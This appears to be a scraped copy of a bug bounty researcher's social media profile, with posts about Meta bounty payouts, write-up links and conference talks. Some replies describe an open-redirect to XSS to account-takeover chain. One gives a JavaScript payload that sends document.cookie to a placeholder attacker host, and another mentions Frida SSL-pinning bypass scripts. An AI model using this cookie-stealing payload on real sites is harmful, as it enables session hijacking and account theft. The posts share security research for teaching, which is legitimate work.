Olivia
Online
Bassem M bazzoun
@bassemmbazzoun
Cybersecurity Researcher at Meta bug bounty program ๐จ๐ปโ๐ป
Lebanon
Joined March 2016
189 Following
898 Followers
71 Posts
ย Pinned Tweet
A reward of 11,250$ from Facebook after reporting a security vulnerability that could allow me to delete any video or reel posted on the platform.
https://t.co/ATapvbc8Ww
#cybersecuriy #BugBounty #hackers #penetrationtesting #facebook #meta
@covert_bugs Android mobile app
In this blog, I will discuss how a security vulnerability I discovered a year ago in Facebook/Meta could be used to affect the US election and how a simple IDOR vulnerability could have a major impact.
I hope you enjoy it :)
#USElection2024 #bugbounty
https://t.co/mAc2F4LrjS
@covert_bugs You may try using older versions that have the "Whitehat Setting" then update the app to latest version. Otherwise, you can find some frida scripts available online on Github to bypass SSL for Instagram.
It was great to attend the Meta Bug Bounty Researchers Conference (BountyCon'24) in Johannesburg, South Africa ๐ฟ๐ฆ๐จ๐ปโ๐ป. I had the opportunity to meet and network with greatest hackers, learn new topics, and connect with the Meta Security team.
#meta #cybersecurity #bugbountytips
@covert_bugs I hunt on Android devices; There is a researcher setting that can help you intercept the Facebook mobile requests. For iOS, you can find some GitHub repositories that contain Frida scripts to bypass SSL. Try searching "Facebook SSL Bypass iOS - GitHub" and check that suit you.
@blackcloudes @_SaudSubaie ุงูุฅุฌุงุจุฉ ุนูู ูุฐุง ุงูุณุคุงู ูุฏ ุชููู ุทูููุฉ ูุฃููุง ู
ูุถูุน ูุงุณุน ูุญุชุงุฌ ุฅูู ุดุฑุญ ู
ูุตูุ ูููู ุจุดูู ุนุงู
ุ ูุฑุชุจุท ูุฐุง ุจุงููุฑุตูุฉ ุงูุฃุฎูุงููุฉ ูุตูุฏ ุงูุซุบุฑุงุช ุงูุฃู
ููุฉ ูุจุฑุงู
ุฌ ุงู (Bug bounty). ุฃููู
ุจูุญุต ุงูู
ูุงูุน ูุฃุญุงูู ุงูุนุซูุฑ ุนูู ุซุบุฑุงุช ุฃู
ููุฉ ูู
ู ุซู
ุฃููู
ุจุงูุฅุจูุงุบ ุนููุง ููุดุฑูุฉ.
@_SaudSubaie ุดูุฑุง ุนูู ุงููุดุฑ ๐๐ป๐
I'm excited to speak at GISEC Global, Middle East and Africa's Largest Cybersecurity event - from 23-25 April 2024 at Dubai World Trade Centre.
Come and join me, register now for a free pass: https://t.co/52UzaMr9sA
#GISECGLOBAL #cybersecurity #infosecurity #ethicalhacking
@L3onid1s Well done! ๐๐ป๐๐ป
Found an endpoint:
โฆ/redacted?redirectionParam=/Path
1. Supplied any url: (Open redirect โ
)
2.Supplied javascript:alert(1) ( XSS โ
)
3.Created payload to steal the victimโs cookies and redirect them to our own website: ( ATO โ
)
#BugBounty #bugbountytips #hackerone
@m4ngofloat_ Above is a simple payload that retrieve the cookies using document.cookie then redirect the victim to our own website and appends the cookies to the URL. Then you can check the logs on your website and retrieve the victim cookies.
@m4ngofloat_ You may write your own JS payload that steal the victim cookies and redirect it to your own server.
E.g:
javascript:(function() {
var data = encodeURIComponent(document.cookie);
window.location.href = "https://{INTERACTSH_LINK}/attacker?cookies="%2bdata;
})();
This is how I was able to leak the cover pages of secret documents that were supposed to be private๐ฅ.
Check out my write-up below. I'd love to hear your thoughts and feedback.
#hackerone #Cybersecurity #ethicalhacking #cyberattacks #bugbounty
https://t.co/2sWJKfenwT
Yay, I was awarded a $3,750 bounty on @Hacker0x01! https://t.co/IldOsFOCm8 #TogetherWeHitHarder #bugbounty #CyberSecurity #hackerone
Bypass email confirmation on Instagram and Facebook โ Meta Bug Bounty [$5000]
https://t.co/G5jhCSZPEB
@VikasBerwal1337 They missed to implement rate limit
Bypassing Two-Factor Authentication for Facebook Accounts ($25,300)
#bugbounty #bugbountytips #cybersecurity #hackerone #ethicalhacking #vulnerability #facebook #meta #instagram #networksecurity #programming #cybersec #infosec
https://t.co/PC3cb4ZkZ5
@reyaz_chawshin Nope, we cannot disclose any vulnerability to the public until it's fully resolved
For people who were unable to access my write-up on Medium, I have created the article below on Linkedin, and you will be able to read the full write-up.
I'm sorry for the inconvenience! I hope you enjoy reading the write-up!
https://t.co/zQZ8hM2aga
Update of the updated link: final_version_999.pdf :')
https://t.co/zQZ8hM2aga
Updated Link:
https://t.co/69M67aihrf
Most Popular Users
Elon Musk 
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.6M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.2M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.8M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.3M followers